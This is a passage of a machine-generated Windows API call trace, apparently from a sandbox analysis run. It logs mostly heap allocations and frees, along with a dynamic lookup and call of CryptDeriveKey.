dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.721] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.721] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0242.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0242.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0242.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0242.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0242.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0242.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0242.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0242.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0242.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0242.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0242.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0242.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0242.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e512f8 [0242.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e512f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0242.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.725] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0242.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0242.726] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) returned 1 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0242.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0242.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0242.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0242.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0242.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0242.730] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0242.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0242.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0242.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0242.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0242.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 